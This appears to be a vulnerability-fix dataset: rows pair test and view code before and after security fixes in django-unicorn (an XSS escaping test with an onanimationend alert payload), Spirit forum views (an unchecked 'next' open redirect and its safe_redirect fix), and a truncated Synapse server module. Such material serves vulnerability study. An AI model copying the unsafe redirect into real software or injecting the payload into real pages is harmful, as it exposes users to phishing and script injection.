assert isinstance(context_data.get("get_name"), types.MethodType)
def test_is_public(component):
assert component._is_public("test_name")
def test_is_public_protected(component):
assert component._is_public("_test_name") == False
def test_is_public_http_method_names(component):
assert component._is_public("http_method_names") == False
def test_meta_javascript_exclude():
class TestComponent(UnicornView):
name = "World"
class Meta:
javascript_exclude = ("name",)
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert "name" not in component.get_frontend_context_variables()
assert "name" in component.get_context_data()
def test_meta_exclude():
class TestComponent(UnicornView):
name = "World"
class Meta:
exclude = ("name",)
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert "name" not in component.get_frontend_context_variables()
assert "name" not in component.get_context_data()
| import types
import orjson
import pytest
from django_unicorn.components import UnicornView
class ExampleComponent(UnicornView):
name = "World"
def get_name(self):
return "World"
@pytest.fixture()
def component():
return ExampleComponent(component_id="asdf1234", component_name="example")
def test_init_with_template_name():
class TestComponent(UnicornView):
template_name = "unicorn/test.html"
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert component.template_name == "unicorn/test.html"
def test_init_with_get_template_names():
class TestComponent(UnicornView):
def get_template_names(self):
return []
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert component.template_name is None
def test_init_attribute_names_cache(component):
attribute_names_cache = component._attribute_names_cache
assert len(attribute_names_cache) == 1
assert attribute_names_cache[0] == "name"
def test_init_attribute_names(component):
attribute_names = component._attribute_names()
assert len(attribute_names) == 1
assert attribute_names[0] == "name"
def test_init_attributes(component):
attributes = component._attributes()
assert len(attributes) == 1
assert attributes["name"] == "World"
def test_init_properties():
class TestComponent(UnicornView):
@property
def name(self):
return "World"
component = TestComponent(component_id="asdf1234", component_name="hello-world")
attributes = component._attributes()
assert len(attributes) == 1
assert attributes["name"] == "World"
def test_init_methods_cache(component):
assert len(component._methods_cache) == 1
def test_init_methods(component):
methods = component._methods()
assert len(methods) == 1
assert methods["get_name"]() == "World"
def test_get_frontend_context_variables(component):
frontend_context_variables = component.get_frontend_context_variables()
frontend_context_variables_dict = orjson.loads(frontend_context_variables)
assert len(frontend_context_variables_dict) == 1
assert frontend_context_variables_dict.get("name") == "World"
def test_get_context_data(component):
context_data = component.get_context_data()
assert (
len(context_data) == 4
) # `unicorn` and `view` are added to context data by default
assert context_data.get("name") == "World"
assert isinstance(context_data.get("get_name"), types.MethodType)
def test_is_public(component):
assert component._is_public("test_name")
def test_is_public_protected(component):
assert component._is_public("_test_name") == False
def test_is_public_http_method_names(component):
assert component._is_public("http_method_names") == False
def test_meta_javascript_exclude():
class TestComponent(UnicornView):
name = "World"
class Meta:
javascript_exclude = ("name",)
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert "name" not in component.get_frontend_context_variables()
assert "name" in component.get_context_data()
def test_meta_exclude():
class TestComponent(UnicornView):
name = "World"
class Meta:
exclude = ("name",)
component = TestComponent(component_id="asdf1234", component_name="hello-world")
assert "name" not in component.get_frontend_context_variables()
assert "name" not in component.get_context_data()
| xss | {
"code": [
"def test_get_frontend_context_variables_xss(component):",
" component.name = '<a><style>@keyframes x{}</style><a style=\"animation-name:x\" onanimationend=\"alert(1)\"></a>'",
" frontend_context_variables = component.get_frontend_context_variables()",
" frontend_context_variables_dict = orjson.loads(frontend_context_variables)",
" assert len(frontend_context_variables_dict) == 1",
" assert (",
" frontend_context_variables_dict.get(\"name\")",
" == \"<a><style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>\"",
" )",
"def test_get_frontend_context_variables_safe(component):",
" component.name = '<a><style>@keyframes x{}</style><a style=\"animation-name:x\" onanimationend=\"alert(1)\"></a>'",
" class Meta:",
" safe = [",
" \"name\",",
" ]",
" setattr(component, \"Meta\", Meta())",
" frontend_context_variables = component.get_frontend_context_variables()",
" frontend_context_variables_dict = orjson.loads(frontend_context_variables)",
" assert len(frontend_context_variables_dict) == 1",
" assert (",
" frontend_context_variables_dict.get(\"name\")",
" == '<a><style>@keyframes x{}</style><a style=\"animation-name:x\" onanimationend=\"alert(1)\"></a>'",
" )"
],
"line_no": [
85,
87,
89,
90,
91,
92,
93,
94,
95,
98,
100,
102,
103,
104,
105,
107,
109,
110,
111,
112,
113,
114,
115
]
} | {
"code": [],
"line_no": []
} | import types
import orjson
import pytest
from django_unicorn.components import UnicornView
class CLASS_0(UnicornView):
VAR_1 = "World"
def FUNC_18(self):
return "World"
@pytest.fixture()
def VAR_0():
return CLASS_0(component_id="asdf1234", component_name="example")
def FUNC_1():
class CLASS_1(UnicornView):
VAR_9 = "unicorn/test.html"
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert VAR_0.template_name == "unicorn/test.html"
def FUNC_2():
class CLASS_1(UnicornView):
def FUNC_19(self):
return []
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert VAR_0.template_name is None
def FUNC_3(VAR_0):
VAR_2 = VAR_0._attribute_names_cache
assert len(VAR_2) == 1
assert VAR_2[0] == "name"
def FUNC_4(VAR_0):
VAR_3 = VAR_0._attribute_names()
assert len(VAR_3) == 1
assert VAR_3[0] == "name"
def FUNC_5(VAR_0):
VAR_4 = VAR_0._attributes()
assert len(VAR_4) == 1
assert VAR_4["name"] == "World"
def FUNC_6():
class CLASS_1(UnicornView):
@property
def VAR_1(self):
return "World"
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
VAR_4 = VAR_0._attributes()
assert len(VAR_4) == 1
assert VAR_4["name"] == "World"
def FUNC_7(VAR_0):
assert len(VAR_0._methods_cache) == 1
def FUNC_8(VAR_0):
VAR_5 = VAR_0._methods()
assert len(VAR_5) == 1
assert VAR_5["get_name"]() == "World"
def FUNC_9(VAR_0):
VAR_6 = VAR_0.get_frontend_context_variables()
VAR_7 = orjson.loads(VAR_6)
assert len(VAR_7) == 1
assert VAR_7.get("name") == "World"
def FUNC_10(VAR_0):
VAR_0.name = '<a><style>@keyframes x{}</style><a style="animation-VAR_1:x" onanimationend="alert(1)"></a>'
VAR_6 = VAR_0.get_frontend_context_variables()
VAR_7 = orjson.loads(VAR_6)
assert len(VAR_7) == 1
assert (
VAR_7.get("name")
== "<a><style>@keyframes x{}</style><a style="animation-VAR_1:x" onanimationend="alert(1)"></a>"
)
def FUNC_11(VAR_0):
VAR_0.name = '<a><style>@keyframes x{}</style><a style="animation-VAR_1:x" onanimationend="alert(1)"></a>'
class CLASS_2:
VAR_10 = [
"name",
]
setattr(VAR_0, "Meta", CLASS_2())
VAR_6 = VAR_0.get_frontend_context_variables()
VAR_7 = orjson.loads(VAR_6)
assert len(VAR_7) == 1
assert (
VAR_7.get("name")
== '<a><style>@keyframes x{}</style><a style="animation-VAR_1:x" onanimationend="alert(1)"></a>'
)
def FUNC_12(VAR_0):
VAR_8 = VAR_0.get_context_data()
assert (
len(VAR_8) == 4
) # `unicorn` and `view` are added to context data by default
assert VAR_8.get("name") == "World"
assert isinstance(VAR_8.get("get_name"), types.MethodType)
def FUNC_13(VAR_0):
assert VAR_0._is_public("test_name")
def FUNC_14(VAR_0):
assert VAR_0._is_public("_test_name") == False
def FUNC_15(VAR_0):
assert VAR_0._is_public("http_method_names") == False
def FUNC_16():
class CLASS_1(UnicornView):
VAR_1 = "World"
class CLASS_2:
VAR_11 = ("name",)
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert "name" not in VAR_0.get_frontend_context_variables()
assert "name" in VAR_0.get_context_data()
def FUNC_17():
class CLASS_1(UnicornView):
VAR_1 = "World"
class CLASS_2:
VAR_12 = ("name",)
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert "name" not in VAR_0.get_frontend_context_variables()
assert "name" not in VAR_0.get_context_data()
| import types
import orjson
import pytest
from django_unicorn.components import UnicornView
class CLASS_0(UnicornView):
VAR_1 = "World"
def FUNC_16(self):
return "World"
@pytest.fixture()
def VAR_0():
return CLASS_0(component_id="asdf1234", component_name="example")
def FUNC_1():
class CLASS_1(UnicornView):
VAR_9 = "unicorn/test.html"
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert VAR_0.template_name == "unicorn/test.html"
def FUNC_2():
class CLASS_1(UnicornView):
def FUNC_17(self):
return []
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert VAR_0.template_name is None
def FUNC_3(VAR_0):
VAR_2 = VAR_0._attribute_names_cache
assert len(VAR_2) == 1
assert VAR_2[0] == "name"
def FUNC_4(VAR_0):
VAR_3 = VAR_0._attribute_names()
assert len(VAR_3) == 1
assert VAR_3[0] == "name"
def FUNC_5(VAR_0):
VAR_4 = VAR_0._attributes()
assert len(VAR_4) == 1
assert VAR_4["name"] == "World"
def FUNC_6():
class CLASS_1(UnicornView):
@property
def VAR_1(self):
return "World"
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
VAR_4 = VAR_0._attributes()
assert len(VAR_4) == 1
assert VAR_4["name"] == "World"
def FUNC_7(VAR_0):
assert len(VAR_0._methods_cache) == 1
def FUNC_8(VAR_0):
VAR_5 = VAR_0._methods()
assert len(VAR_5) == 1
assert VAR_5["get_name"]() == "World"
def FUNC_9(VAR_0):
VAR_6 = VAR_0.get_frontend_context_variables()
VAR_7 = orjson.loads(VAR_6)
assert len(VAR_7) == 1
assert VAR_7.get("name") == "World"
def FUNC_10(VAR_0):
VAR_8 = VAR_0.get_context_data()
assert (
len(VAR_8) == 4
) # `unicorn` and `view` are added to context data by default
assert VAR_8.get("name") == "World"
assert isinstance(VAR_8.get("get_name"), types.MethodType)
def FUNC_11(VAR_0):
assert VAR_0._is_public("test_name")
def FUNC_12(VAR_0):
assert VAR_0._is_public("_test_name") == False
def FUNC_13(VAR_0):
assert VAR_0._is_public("http_method_names") == False
def FUNC_14():
class CLASS_1(UnicornView):
VAR_1 = "World"
class CLASS_2:
VAR_10 = ("name",)
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert "name" not in VAR_0.get_frontend_context_variables()
assert "name" in VAR_0.get_context_data()
def FUNC_15():
class CLASS_1(UnicornView):
VAR_1 = "World"
class CLASS_2:
VAR_11 = ("name",)
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert "name" not in VAR_0.get_frontend_context_variables()
assert "name" not in VAR_0.get_context_data()
| [
2,
5,
7,
8,
11,
14,
15,
19,
20,
24,
27,
28,
33,
36,
37,
42,
43,
48,
49,
54,
55,
61,
66,
67,
70,
71,
76,
77,
83,
84,
86,
88,
96,
97,
99,
101,
106,
108,
116,
117,
125,
126,
129,
130,
133,
134,
137,
138,
142,
145,
149,
150,
154,
157,
161
] | [
2,
5,
7,
8,
11,
14,
15,
19,
20,
24,
27,
28,
33,
36,
37,
42,
43,
48,
49,
54,
55,
61,
66,
67,
70,
71,
76,
77,
83,
84,
92,
93,
96,
97,
100,
101,
104,
105,
109,
112,
116,
117,
121,
124,
128
] |
4CWE-601
| # -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.shortcuts import redirect
from django.views.decorators.http import require_POST
from django.contrib import messages
from .models import TopicFavorite
from .forms import FavoriteForm
from ..models import Topic
from ...core import utils
@require_POST
@login_required
def create(request, topic_id):
topic = get_object_or_404(Topic, pk=topic_id)
form = FavoriteForm(user=request.user, topic=topic, data=request.POST)
if form.is_valid():
form.save()
else:
messages.error(request, utils.render_form_errors(form))
return redirect(request.POST.get('next', topic.get_absolute_url()))
@require_POST
@login_required
def delete(request, pk):
favorite = get_object_or_404(TopicFavorite, pk=pk, user=request.user)
favorite.delete()
return redirect(request.POST.get('next', favorite.topic.get_absolute_url()))
| # -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.views.decorators.http import require_POST
from django.contrib import messages
from .models import TopicFavorite
from .forms import FavoriteForm
from ..models import Topic
from spirit.core import utils
from spirit.core.utils.http import safe_redirect
@require_POST
@login_required
def create(request, topic_id):
topic = get_object_or_404(Topic, pk=topic_id)
form = FavoriteForm(user=request.user, topic=topic, data=request.POST)
if form.is_valid():
form.save()
else:
messages.error(request, utils.render_form_errors(form))
return safe_redirect(request, 'next', topic.get_absolute_url(), method='POST')
@require_POST
@login_required
def delete(request, pk):
favorite = get_object_or_404(TopicFavorite, pk=pk, user=request.user)
favorite.delete()
return safe_redirect(request, 'next', favorite.topic.get_absolute_url(), method='POST')
| open_redirect | {
"code": [
"from django.shortcuts import redirect",
"from ...core import utils",
" return redirect(request.POST.get('next', topic.get_absolute_url()))",
" return redirect(request.POST.get('next', favorite.topic.get_absolute_url()))"
],
"line_no": [
5,
12,
26,
34
]
} | {
"code": [
"from spirit.core import utils",
"from spirit.core.utils.http import safe_redirect",
" return safe_redirect(request, 'next', topic.get_absolute_url(), method='POST')",
" return safe_redirect(request, 'next', favorite.topic.get_absolute_url(), method='POST')"
],
"line_no": [
11,
12,
26,
34
]
} |
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.shortcuts import redirect
from django.views.decorators.http import require_POST
from django.contrib import messages
from .models import TopicFavorite
from .forms import FavoriteForm
from ..models import Topic
from ...core import utils
@require_POST
@login_required
def FUNC_0(VAR_0, VAR_1):
VAR_3 = get_object_or_404(Topic, VAR_2=VAR_1)
VAR_4 = FavoriteForm(user=VAR_0.user, VAR_3=topic, data=VAR_0.POST)
if VAR_4.is_valid():
VAR_4.save()
else:
messages.error(VAR_0, utils.render_form_errors(VAR_4))
return redirect(VAR_0.POST.get('next', VAR_3.get_absolute_url()))
@require_POST
@login_required
def FUNC_1(VAR_0, VAR_2):
VAR_5 = get_object_or_404(TopicFavorite, VAR_2=pk, user=VAR_0.user)
VAR_5.delete()
return redirect(VAR_0.POST.get('next', VAR_5.topic.get_absolute_url()))
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.views.decorators.http import require_POST
from django.contrib import messages
from .models import TopicFavorite
from .forms import FavoriteForm
from ..models import Topic
from spirit.core import utils
from spirit.core.utils.http import safe_redirect
@require_POST
@login_required
def FUNC_0(VAR_0, VAR_1):
VAR_3 = get_object_or_404(Topic, VAR_2=VAR_1)
VAR_4 = FavoriteForm(user=VAR_0.user, VAR_3=topic, data=VAR_0.POST)
if VAR_4.is_valid():
VAR_4.save()
else:
messages.error(VAR_0, utils.render_form_errors(VAR_4))
return safe_redirect(VAR_0, 'next', VAR_3.get_absolute_url(), method='POST')
@require_POST
@login_required
def FUNC_1(VAR_0, VAR_2):
VAR_5 = get_object_or_404(TopicFavorite, VAR_2=pk, user=VAR_0.user)
VAR_5.delete()
return safe_redirect(VAR_0, 'next', VAR_5.topic.get_absolute_url(), method='POST')
| [
1,
2,
8,
13,
14,
20,
25,
27,
28,
35
] | [
1,
2,
7,
13,
14,
20,
25,
27,
28,
35
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017-2018 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file provides some classes for setting up (partially-populated)
# homeservers; either as a full homeserver as a real application, or a small
# partial one for unit test mocking.
# Imports required for the default HomeServer() implementation
import abc
import functools
import logging
import os
from typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, TypeVar, cast
import twisted.internet.base
import twisted.internet.tcp
from twisted.mail.smtp import sendmail
from twisted.web.iweb import IPolicyForHTTPS
from synapse.api.auth import Auth
from synapse.api.filtering import Filtering
from synapse.api.ratelimiting import Ratelimiter
from synapse.appservice.api import ApplicationServiceApi
from synapse.appservice.scheduler import ApplicationServiceScheduler
from synapse.config.homeserver import HomeServerConfig
from synapse.crypto import context_factory
from synapse.crypto.context_factory import RegularPolicyForHTTPS
from synapse.crypto.keyring import Keyring
from synapse.events.builder import EventBuilderFactory
from synapse.events.spamcheck import SpamChecker
from synapse.events.third_party_rules import ThirdPartyEventRules
from synapse.events.utils import EventClientSerializer
from synapse.federation.federation_client import FederationClient
from synapse.federation.federation_server import (
FederationHandlerRegistry,
FederationServer,
)
from synapse.federation.send_queue import FederationRemoteSendQueue
from synapse.federation.sender import FederationSender
from synapse.federation.transport.client import TransportLayerClient
from synapse.groups.attestations import GroupAttestationSigning, GroupAttestionRenewer
from synapse.groups.groups_server import GroupsServerHandler, GroupsServerWorkerHandler
from synapse.handlers.account_validity import AccountValidityHandler
from synapse.handlers.acme import AcmeHandler
from synapse.handlers.admin import AdminHandler
from synapse.handlers.appservice import ApplicationServicesHandler
from synapse.handlers.auth import AuthHandler, MacaroonGenerator
from synapse.handlers.cas_handler import CasHandler
from synapse.handlers.deactivate_account import DeactivateAccountHandler
from synapse.handlers.device import DeviceHandler, DeviceWorkerHandler
from synapse.handlers.devicemessage import DeviceMessageHandler
from synapse.handlers.directory import DirectoryHandler
from synapse.handlers.e2e_keys import E2eKeysHandler
from synapse.handlers.e2e_room_keys import E2eRoomKeysHandler
from synapse.handlers.events import EventHandler, EventStreamHandler
from synapse.handlers.federation import FederationHandler
from synapse.handlers.groups_local import GroupsLocalHandler, GroupsLocalWorkerHandler
from synapse.handlers.identity import IdentityHandler
from synapse.handlers.initial_sync import InitialSyncHandler
from synapse.handlers.message import EventCreationHandler, MessageHandler
from synapse.handlers.pagination import PaginationHandler
from synapse.handlers.password_policy import PasswordPolicyHandler
from synapse.handlers.presence import PresenceHandler
from synapse.handlers.profile import ProfileHandler
from synapse.handlers.read_marker import ReadMarkerHandler
from synapse.handlers.receipts import ReceiptsHandler
from synapse.handlers.register import RegistrationHandler
from synapse.handlers.room import (
RoomContextHandler,
RoomCreationHandler,
RoomShutdownHandler,
)
from synapse.handlers.room_list import RoomListHandler
from synapse.handlers.room_member import RoomMemberMasterHandler
from synapse.handlers.room_member_worker import RoomMemberWorkerHandler
from synapse.handlers.search import SearchHandler
from synapse.handlers.set_password import SetPasswordHandler
from synapse.handlers.sso import SsoHandler
from synapse.handlers.stats import StatsHandler
from synapse.handlers.sync import SyncHandler
from synapse.handlers.typing import FollowerTypingHandler, TypingWriterHandler
from synapse.handlers.user_directory import UserDirectoryHandler
from synapse.http.client import InsecureInterceptableContextFactory, SimpleHttpClient
from synapse.http.matrixfederationclient import MatrixFederationHttpClient
from synapse.module_api import ModuleApi
from synapse.notifier import Notifier
from synapse.push.action_generator import ActionGenerator
from synapse.push.pusherpool import PusherPool
from synapse.replication.tcp.client import ReplicationDataHandler
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.resource import ReplicationStreamer
from synapse.replication.tcp.streams import STREAMS_MAP, Stream
from synapse.rest.media.v1.media_repository import (
MediaRepository,
MediaRepositoryResource,
)
from synapse.secrets import Secrets
from synapse.server_notices.server_notices_manager import ServerNoticesManager
from synapse.server_notices.server_notices_sender import ServerNoticesSender
from synapse.server_notices.worker_server_notices_sender import (
WorkerServerNoticesSender,
)
from synapse.state import StateHandler, StateResolutionHandler
from synapse.storage import Databases, DataStore, Storage
from synapse.streams.events import EventSources
from synapse.types import DomainSpecificString
from synapse.util import Clock
from synapse.util.distributor import Distributor
from synapse.util.ratelimitutils import FederationRateLimiter
from synapse.util.stringutils import random_string
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from synapse.handlers.oidc_handler import OidcHandler
from synapse.handlers.saml_handler import SamlHandler
T = TypeVar("T", bound=Callable[..., Any])
def cache_in_self(builder: T) -> T:
"""Wraps a function called e.g. `get_foo`, checking if `self.foo` exists and
returning if so. If not, calls the given function and sets `self.foo` to it.
Also ensures that dependency cycles throw an exception correctly, rather
than overflowing the stack.
"""
if not builder.__name__.startswith("get_"):
raise Exception(
"@cache_in_self can only be used on functions starting with `get_`"
)
# get_attr -> _attr
depname = builder.__name__[len("get") :]
building = [False]
@functools.wraps(builder)
def _get(self):
try:
return getattr(self, depname)
except AttributeError:
pass
# Prevent cyclic dependencies from deadlocking
if building[0]:
raise ValueError("Cyclic dependency while building %s" % (depname,))
building[0] = True
try:
dep = builder(self)
setattr(self, depname, dep)
finally:
building[0] = False
return dep
# We cast here as we need to tell mypy that `_get` has the same signature as
# `builder`.
return cast(T, _get)
class HomeServer(metaclass=abc.ABCMeta):
"""A basic homeserver object without lazy component builders.
This will need all of the components it requires to either be passed as
constructor arguments, or the relevant methods overriding to create them.
Typically this would only be used for unit tests.
Dependencies should be added by creating a `def get_<depname>(self)`
function, wrapping it in `@cache_in_self`.
Attributes:
config (synapse.config.homeserver.HomeserverConfig):
_listening_services (list[twisted.internet.tcp.Port]): TCP ports that
we are listening on to provide HTTP services.
"""
REQUIRED_ON_BACKGROUND_TASK_STARTUP = [
"account_validity",
"auth",
"deactivate_account",
"message",
"pagination",
"profile",
"stats",
]
# This is overridden in derived application classes
# (such as synapse.app.homeserver.SynapseHomeServer) and gives the class to be
# instantiated during setup() for future return by get_datastore()
DATASTORE_CLASS = abc.abstractproperty()
def __init__(
self,
hostname: str,
config: HomeServerConfig,
reactor=None,
version_string="Synapse",
):
"""
Args:
hostname : The hostname for the server.
config: The full config for the homeserver.
"""
if not reactor:
from twisted.internet import reactor as _reactor
reactor = _reactor
self._reactor = reactor
self.hostname = hostname
# the key we use to sign events and requests
self.signing_key = config.key.signing_key[0]
self.config = config
self._listening_services = [] # type: List[twisted.internet.tcp.Port]
self.start_time = None # type: Optional[int]
self._instance_id = random_string(5)
self._instance_name = config.worker_name or "master"
self.version_string = version_string
self.datastores = None # type: Optional[Databases]
def get_instance_id(self) -> str:
"""A unique ID for this synapse process instance.
This is used to distinguish running instances in worker-based
deployments.
"""
return self._instance_id
def get_instance_name(self) -> str:
"""A unique name for this synapse process.
Used to identify the process over replication and in config. Does not
change over restarts.
"""
return self._instance_name
def setup(self) -> None:
logger.info("Setting up.")
self.start_time = int(self.get_clock().time())
self.datastores = Databases(self.DATASTORE_CLASS, self)
logger.info("Finished setting up.")
# Register background tasks required by this server. This must be done
# somewhat manually due to the background tasks not being registered
# unless handlers are instantiated.
if self.config.run_background_tasks:
self.setup_background_tasks()
def setup_background_tasks(self) -> None:
"""
Some handlers have side effects on instantiation (like registering
background updates). This function causes them to be fetched, and
therefore instantiated, to run those side effects.
"""
for i in self.REQUIRED_ON_BACKGROUND_TASK_STARTUP:
getattr(self, "get_" + i + "_handler")()
def get_reactor(self) -> twisted.internet.base.ReactorBase:
"""
Fetch the Twisted reactor in use by this HomeServer.
"""
return self._reactor
def get_ip_from_request(self, request) -> str:
# X-Forwarded-For is handled by our custom request type.
return request.getClientIP()
def is_mine(self, domain_specific_string: DomainSpecificString) -> bool:
return domain_specific_string.domain == self.hostname
def is_mine_id(self, string: str) -> bool:
return string.split(":", 1)[1] == self.hostname
@cache_in_self
def get_clock(self) -> Clock:
return Clock(self._reactor)
def get_datastore(self) -> DataStore:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores.main
def get_datastores(self) -> Databases:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores
def get_config(self) -> HomeServerConfig:
return self.config
@cache_in_self
def get_distributor(self) -> Distributor:
return Distributor()
@cache_in_self
def get_registration_ratelimiter(self) -> Ratelimiter:
return Ratelimiter(
clock=self.get_clock(),
rate_hz=self.config.rc_registration.per_second,
burst_count=self.config.rc_registration.burst_count,
)
@cache_in_self
def get_federation_client(self) -> FederationClient:
return FederationClient(self)
@cache_in_self
def get_federation_server(self) -> FederationServer:
return FederationServer(self)
@cache_in_self
def get_notifier(self) -> Notifier:
return Notifier(self)
@cache_in_self
def get_auth(self) -> Auth:
return Auth(self)
@cache_in_self
def get_http_client_context_factory(self) -> IPolicyForHTTPS:
return (
InsecureInterceptableContextFactory()
if self.config.use_insecure_ssl_client_just_for_testing_do_not_use
else RegularPolicyForHTTPS()
)
@cache_in_self
def get_simple_http_client(self) -> SimpleHttpClient:
return SimpleHttpClient(self)
@cache_in_self
def get_proxied_http_client(self) -> SimpleHttpClient:
return SimpleHttpClient(
self,
http_proxy=os.getenvb(b"http_proxy"),
https_proxy=os.getenvb(b"HTTPS_PROXY"),
)
@cache_in_self
def get_room_creation_handler(self) -> RoomCreationHandler:
return RoomCreationHandler(self)
@cache_in_self
def get_room_shutdown_handler(self) -> RoomShutdownHandler:
return RoomShutdownHandler(self)
@cache_in_self
def get_sendmail(self) -> sendmail:
return sendmail
@cache_in_self
def get_state_handler(self) -> StateHandler:
return StateHandler(self)
@cache_in_self
def get_state_resolution_handler(self) -> StateResolutionHandler:
return StateResolutionHandler(self)
@cache_in_self
def get_presence_handler(self) -> PresenceHandler:
return PresenceHandler(self)
@cache_in_self
def get_typing_handler(self):
if self.config.worker.writers.typing == self.get_instance_name():
return TypingWriterHandler(self)
else:
return FollowerTypingHandler(self)
@cache_in_self
def get_sso_handler(self) -> SsoHandler:
return SsoHandler(self)
@cache_in_self
def get_sync_handler(self) -> SyncHandler:
return SyncHandler(self)
@cache_in_self
def get_room_list_handler(self) -> RoomListHandler:
return RoomListHandler(self)
@cache_in_self
def get_auth_handler(self) -> AuthHandler:
return AuthHandler(self)
@cache_in_self
def get_macaroon_generator(self) -> MacaroonGenerator:
return MacaroonGenerator(self)
@cache_in_self
def get_device_handler(self):
if self.config.worker_app:
return DeviceWorkerHandler(self)
else:
return DeviceHandler(self)
@cache_in_self
def get_device_message_handler(self) -> DeviceMessageHandler:
return DeviceMessageHandler(self)
@cache_in_self
def get_directory_handler(self) -> DirectoryHandler:
return DirectoryHandler(self)
@cache_in_self
def get_e2e_keys_handler(self) -> E2eKeysHandler:
return E2eKeysHandler(self)
@cache_in_self
def get_e2e_room_keys_handler(self) -> E2eRoomKeysHandler:
return E2eRoomKeysHandler(self)
@cache_in_self
def get_acme_handler(self) -> AcmeHandler:
return AcmeHandler(self)
@cache_in_self
def get_admin_handler(self) -> AdminHandler:
return AdminHandler(self)
@cache_in_self
def get_application_service_api(self) -> ApplicationServiceApi:
return ApplicationServiceApi(self)
@cache_in_self
def get_application_service_scheduler(self) -> ApplicationServiceScheduler:
return ApplicationServiceScheduler(self)
@cache_in_self
def get_application_service_handler(self) -> ApplicationServicesHandler:
return ApplicationServicesHandler(self)
@cache_in_self
def get_event_handler(self) -> EventHandler:
return EventHandler(self)
@cache_in_self
def get_event_stream_handler(self) -> EventStreamHandler:
return EventStreamHandler(self)
@cache_in_self
def get_federation_handler(self) -> FederationHandler:
return FederationHandler(self)
@cache_in_self
def get_identity_handler(self) -> IdentityHandler:
return IdentityHandler(self)
@cache_in_self
def get_initial_sync_handler(self) -> InitialSyncHandler:
return InitialSyncHandler(self)
@cache_in_self
def get_profile_handler(self):
return ProfileHandler(self)
@cache_in_self
def get_event_creation_handler(self) -> EventCreationHandler:
return EventCreationHandler(self)
@cache_in_self
def get_deactivate_account_handler(self) -> DeactivateAccountHandler:
return DeactivateAccountHandler(self)
@cache_in_self
def get_search_handler(self) -> SearchHandler:
return SearchHandler(self)
@cache_in_self
def get_set_password_handler(self) -> SetPasswordHandler:
return SetPasswordHandler(self)
@cache_in_self
def get_event_sources(self) -> EventSources:
return EventSources(self)
@cache_in_self
def get_keyring(self) -> Keyring:
return Keyring(self)
@cache_in_self
def get_event_builder_factory(self) -> EventBuilderFactory:
return EventBuilderFactory(self)
@cache_in_self
def get_filtering(self) -> Filtering:
return Filtering(self)
@cache_in_self
def get_pusherpool(self) -> PusherPool:
return PusherPool(self)
@cache_in_self
def get_http_client(self) -> MatrixFederationHttpClient:
tls_client_options_factory = context_factory.FederationPolicyForHTTPS(
self.config
)
return MatrixFederationHttpClient(self, tls_client_options_factory)
@cache_in_self
def get_media_repository_resource(self) -> MediaRepositoryResource:
# build the media repo resource. This indirects through the HomeServer
# to ensure that we only have a single instance of
return MediaRepositoryResource(self)
@cache_in_self
def get_media_repository(self) -> MediaRepository:
return MediaRepository(self)
@cache_in_self
def get_federation_transport_client(self) -> TransportLayerClient:
return TransportLayerClient(self)
@cache_in_self
def get_federation_sender(self):
if self.should_send_federation():
return FederationSender(self)
elif not self.config.worker_app:
return FederationRemoteSendQueue(self)
else:
raise Exception("Workers cannot send federation traffic")
@cache_in_self
def get_receipts_handler(self) -> ReceiptsHandler:
return ReceiptsHandler(self)
@cache_in_self
def get_read_marker_handler(self) -> ReadMarkerHandler:
return ReadMarkerHandler(self)
@cache_in_self
def get_tcp_replication(self) -> ReplicationCommandHandler:
return ReplicationCommandHandler(self)
@cache_in_self
def get_action_generator(self) -> ActionGenerator:
return ActionGenerator(self)
@cache_in_self
def get_user_directory_handler(self) -> UserDirectoryHandler:
return UserDirectoryHandler(self)
@cache_in_self
def get_groups_local_handler(self):
if self.config.worker_app:
return GroupsLocalWorkerHandler(self)
else:
return GroupsLocalHandler(self)
@cache_in_self
def get_groups_server_handler(self):
if self.config.worker_app:
return GroupsServerWorkerHandler(self)
else:
return GroupsServerHandler(self)
@cache_in_self
def get_groups_attestation_signing(self) -> GroupAttestationSigning:
return GroupAttestationSigning(self)
@cache_in_self
def get_groups_attestation_renewer(self) -> GroupAttestionRenewer:
return GroupAttestionRenewer(self)
@cache_in_self
def get_secrets(self) -> Secrets:
return Secrets()
@cache_in_self
def get_stats_handler(self) -> StatsHandler:
return StatsHandler(self)
@cache_in_self
def get_spam_checker(self):
return SpamChecker(self)
@cache_in_self
def get_third_party_event_rules(self) -> ThirdPartyEventRules:
return ThirdPartyEventRules(self)
@cache_in_self
def get_room_member_handler(self):
if self.config.worker_app:
